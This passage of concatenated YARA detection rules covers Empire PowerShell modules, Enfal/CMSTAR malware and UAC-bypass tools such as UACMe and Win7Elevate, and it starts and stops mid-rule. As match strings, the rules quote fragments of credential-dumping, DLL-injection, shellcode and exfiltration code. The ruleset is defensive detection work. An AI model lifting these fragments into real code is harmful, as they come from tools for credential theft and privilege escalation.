Invoke-PowerDump.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1" strings: $x16 = "$enc = Get-PostHashdumpScript" fullword ascii $x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii $x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii condition: ( uint16(0) == 0x2023 and filesize < 60KB and 1 of them ) or all of them } rule Empire_Install_SSP { meta: description = "Detects Empire component - file Install-SSP.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165" strings: $s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them } rule Empire_Invoke_ShellcodeMSIL { meta: description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f" strings: $s1 = "$FinalShellcode.Length" fullword ascii $s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii $s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii $s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them } rule Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp { meta: description = "Detects Empire component - file PowerUp.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c" strings: $x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii condition: ( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them } rule Empire_Invoke_Mimikatz_Gen { meta: description = "Detects Empire component - file Invoke-Mimikatz.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" strings: $s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii $s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_Get_GPPPassword { meta: description = "Detects Empire component - file Get-GPPPassword.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0" strings: $s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii $s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii $s3 = "function Get-DecryptedCpassword {" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them } rule Empire_Invoke_SmbScanner { meta: description = "Detects Empire component - file Invoke-SmbScanner.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd" strings: $s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii $s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them } rule Empire_Exploit_JBoss { meta: description = "Detects Empire component - file Exploit-JBoss.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653" strings: $s1 = "Exploit-JBoss" fullword ascii $s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii $s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii $s4 = "http://blog.rvrsh3ll.net" fullword ascii $s5 = "Remote URL to your own WARFile to deploy." fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them } rule Empire_dumpCredStore { meta: description = "Detects Empire component - file dumpCredStore.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350" strings: $x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii $s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii $s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii condition: ( uint16(0) == 0x233c and filesize < 40KB and 1 of them ) or all of them } rule Empire_Invoke_EgressCheck { meta: description = "Detects Empire component - file Invoke-EgressCheck.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534" strings: $s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii condition: ( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them } rule Empire_ReflectivePick_x64_orig { meta: description = "Detects Empire component - file ReflectivePick_x64_orig.dll" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2" strings: $s1 = "\\PowerShellRunner.pdb" fullword ascii $s2 = "PowerShellRunner.dll" fullword wide $s3 = "ReflectivePick_x64.dll" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them ) or all of them } rule Empire_Out_Minidump { meta: description = "Detects Empire component - file Out-Minidump.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1" strings: $s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii $s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them } rule Empire_Invoke_PsExec { meta: description = "Detects Empire component - file Invoke-PsExec.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88" strings: $s1 = "Invoke-PsExecCmd" fullword ascii $s2 = "\"[*] Executing service .EXE" fullword ascii $s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii condition: ( uint16(0) == 0x7566 and filesize < 50KB and 1 of them ) or all of them } rule Empire_Invoke_PostExfil { meta: description = "Detects Empire component - file Invoke-PostExfil.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e" strings: $s1 = "# upload to a specified exfil URI" fullword ascii $s2 = "Server path to exfil to." fullword ascii condition: ( uint16(0) == 0x490a and filesize < 2KB and 1 of them ) or all of them } rule Empire_Invoke_SMBAutoBrute { meta: description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2" strings: $s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii $s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them } rule Empire_Get_Keystrokes { meta: description = "Detects Empire component - file Get-Keystrokes.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad" strings: $s1 = "$RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them } rule Empire_Invoke_DllInjection { meta: description = "Detects Empire component - file Invoke-DllInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0" strings: $s1 = "-Dll evil.dll" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 40KB and 1 of them ) or all of them } rule Empire_KeePassConfig { meta: description = "Detects Empire component - file KeePassConfig.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3" strings: $s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii condition: ( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them } rule Empire_Invoke_SSHCommand { meta: description = "Detects Empire component - file Invoke-SSHCommand.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242" strings: $s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii $s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii $s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii condition: ( uint16(0) == 0x660a and filesize < 2000KB and 1 of them ) or all of them } /* Super Rules ------------------------------------------------------------- */ rule Empire_PowerShell_Framework_Gen1 { meta: description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28" hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" strings: $s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii $s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_PowerUp_Gen { meta: description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c" strings: $s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii $s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii condition: ( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them } rule Empire_PowerShell_Framework_Gen2 { meta: description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-ReflectivePEInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28" hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" strings: $x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii $s20 = "#Shellcode: CallDllMain.asm" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_Agent_Gen { meta: description = "Detects Empire component - from files agent.ps1, agent.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db" hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db" strings: $s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii $s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii $s3 = "if ($script:AgentDelay -ne 0){" fullword ascii condition: ( uint16(0) == 0x660a and filesize < 100KB and 1 of them ) or all of them } rule Empire_PowerShell_Framework_Gen3 { meta: description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" strings: $s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii $s2 = "remote DLL injection" ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_Invoke_InveighRelay_Gen { meta: description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41" strings: $s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii $s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 200KB and 1 of them ) or all of them } rule Empire_KeePassConfig_Gen { meta: description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3" strings: $s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii condition: ( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them } rule Empire_Invoke_Portscan_Gen { meta: description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3" strings: $s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii $s2 = "1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 100KB and 1 of them ) or all of them } rule Empire_PowerShell_Framework_Gen4 { meta: description = "Detects Empire component - from files Invoke-BypassUAC.ps1, Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DllInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PsExec.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-Shellcode.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9" hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28" hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0" hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88" hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438" strings: $s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii $s2 = "# Get a handle to the module specified" fullword ascii $s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii $s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen { meta: description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3" strings: $s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii $s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them } rule Empire_Invoke_Gen { meta: description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28" hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" strings: $s1 = "$Shellcode1 += 0x48" fullword ascii $s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them } rule Empire_PowerShell_Framework_Gen5 { meta: description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" super_rule = 1 hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8" hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4" hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5" strings: $s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii $s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule EnfalCode : Enfal Family { meta: description = "Enfal code tricks" author = "Seth Hardy" last_modified = "2014-06-19" strings: // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 } condition: any of them } rule EnfalStrings : Enfal Family { meta: description = "Enfal Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-19" strings: $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb" $ = "e:\\programs\\LuridDownLoader" $ = "LuridDownloader for Falcon" $ = "DllServiceTrojan" $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\" $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89" $ = "Madonna\x00Jesus" $ = "/iupw82/netstate" $ = "fuckNodAgain" $ = "iloudermao" $ = "Crpq2.cgi" $ = "Clnpp5.cgi" $ = "Dqpq3ll.cgi" $ = "dieosn83.cgi" $ = "Rwpq1.cgi" $ = "/Ccmwhite" $ = "/Cmwhite" $ = "/Crpwhite" $ = "/Dfwhite" $ = "/Query.txt" $ = "/Ufwhite" $ = "/cgl-bin/Clnpp5.cgi" $ = "/cgl-bin/Crpq2.cgi" $ = "/cgl-bin/Dwpq3ll.cgi" $ = "/cgl-bin/Owpq4.cgi" $ = "/cgl-bin/Rwpq1.cgi" $ = "/trandocs/mm/" $ = "/trandocs/netstat" $ = "NFal.exe" $ = "LINLINVMAN" $ = "7NFP4R9W" condition: any of them } rule Enfal : Family { meta: description = "Enfal" author = "Seth Hardy" last_modified = "2014-06-19" condition: EnfalCode or EnfalStrings } rule Enfal_Malware { meta: description = "Detects a certain type of Enfal Malware" author = "Florian Roth" reference = "not set" date = "2015/02/10" hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16" score = 60 strings: $s0 = "POWERPNT.exe" fullword ascii $s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii $s2 = "%HOMEPATH%" fullword ascii $s3 = "Server2008" fullword ascii $s4 = "Server2003" fullword ascii $s5 = "Server2003R2" fullword ascii $s6 = "Server2008R2" fullword ascii $s9 = "%HOMEDRIVE%" fullword ascii $s13 = "%ComSpec%" fullword ascii condition: all of them } rule Enfal_Malware_Backdoor { meta: description = "Generic Rule to detect the Enfal Malware" author = "Florian Roth" date = "2015/02/10" super_rule = 1 hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790" hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b" hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41" score = 60 strings: $mz = { 4d 5a } $x1 = "Micorsoft Corportation" fullword wide $x2 = "IM Monnitor Service" fullword wide $s1 = "imemonsvc.dll" fullword wide $s2 = "iphlpsvc.tmp" fullword $z1 = "urlmon" fullword $z2 = "Registered trademarks and service marks are the property of their respec" wide $z3 = "XpsUnregisterServer" fullword $z4 = "XpsRegisterServer" fullword $z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword condition: ( $mz at 0 ) and ( 1 of ($x*) or ( all of ($s*) and all of ($z*) ) ) } rule ce_enfal_cmstar_debug_msg { meta: Author = "rfalcone" Date = "2015.05.10" Description = "Detects the static debug strings within CMSTAR" Reference = "http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin" strings: $d1 = "EEE\x0d\x0a" fullword $d2 = "TKE\x0d\x0a" fullword $d3 = "VPE\x0d\x0a" fullword $d4 = "VPS\x0d\x0a" fullword $d5 = "WFSE\x0d\x0a" fullword $d6 = "WFSS\x0d\x0a" fullword $d7 = "CM**\x0d\x0a" fullword condition: uint16(0) == 0x5a4d and all of ($d*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Win7Elevatev2 { meta: description = "Detects Win7Elevate - Windows UAC bypass utility" author = "Florian Roth" reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html" date = "2015-05-14" hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29" /* x64 */ hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1" /* x86 */ score = 60 strings: $x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide $x2 = "Win7ElevateV2\\x64\\Release\\" ascii $x3 = "Run the command normally (without code injection)" wide $x4 = "Inject file copy && elevate command" fullword wide $x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide $x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide $s1 = "\\cmd.exe" wide $s2 = "runas" wide $s3 = "explorer.exe" wide $s4 = "Couldn't load kernel32.dll" wide $s5 = "CRYPTBASE.dll" wide $s6 = "shell32.dll" wide $s7 = "ShellExecuteEx" ascii $s8 = "COMCTL32.dll" ascii $s9 = "ShellExecuteEx" ascii $s10 = "HeapAlloc" ascii condition: uint16(0) == 0x5a4d and ( 1 of ($x*) or all of ($s*) ) } rule UACME_Akagi { meta: description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor" author = "Florian Roth" reference = "https://github.com/hfiref0x/UACME" date = "2015-05-14" hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a" hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a" score = 60 strings: $x1 = "UACMe injected, Fubuki at your service." wide fullword $x3 = "%temp%\\Hibiki.dll" fullword wide $x4 = "[UCM] Cannot write to the target process memory." fullword wide $s1 = "%systemroot%\\system32\\cmd.exe" wide $s2 = "D:(A;;GA;;;WD)" wide $s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide $s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide $s5 = "Fubuki.dll" ascii fullword $l1 = "ntdll.dll" ascii $l2 = "Cabinet.dll" ascii $l3 = "GetProcessHeap" ascii $l4 = "WriteProcessMemory" ascii $l5 = "ShellExecuteEx" ascii condition: ( 1 of ($x*) ) or ( 3 of ($s*) and all of ($l*) ) } rule UACElevator { meta: description = "UACElevator bypassing UAC - file UACElevator.exe" author = "Florian Roth" reference = "https://github.com/MalwareTech/UACElevator" date = "2015-05-14" hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6" strings: $x1 = "\\UACElevator.pdb" ascii $s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii $s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii $s3 = "Infection module: %s" fullword ascii $s4 = "Could not save module to %s" fullword ascii $s5 = "%s%s%p%s%ld%s%d%s" fullword ascii $s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii $s7 = "Stack around the variable '" fullword ascii $s8 = "MSVCR120D.dll" fullword wide $s9 = "Address: 0x" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ($s*) ) } rule s4u { meta: description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe" author = "Florian Roth" reference = "https://github.com/aurel26/s-4-u-for-windows" date = "2015-06-05" hash = "cfc18f3d5306df208461459a8e667d89ce44ed77" score = 50 strings: // Specific strings (may change) $x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii $x1 = "\\Release\\s4u.pdb" ascii // Less specific strings $s0 = "CreateProcessAsUser failed (error %u)." fullword ascii $s1 = "GetTokenInformation failed (error: %u)." fullword ascii $s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii $s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii $s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii $s5 = "The token does not have the specified privilege (%S)." fullword ascii $s6 = "Unable to parse command line." fullword ascii $s7 = "Unable to find logon SID." fullword ascii $s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii $s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii // Generic $g1 = "%systemroot%\\system32\\cmd.exe" wide $g2 = "SeTcbPrivilege" wide $g3 = "winsta0\\default" wide $g4 = ".rsrc" $g5 = "HeapAlloc" $g6 = "GetCurrentProcess" $g7 = "HeapFree" $g8 = "GetProcessHeap" $g9 = "ExpandEnvironmentStrings" $g10 = "ConvertStringSidToSid" $g11 = "LookupPrivilegeValue" $g12 = "AllocateLocallyUniqueId" $g13 = "ADVAPI32.dll" $g14 = "LsaLookupAuthenticationPackage" $g15 = "Secur32.dll" $g16 = "MSVCR120.dll" condition: 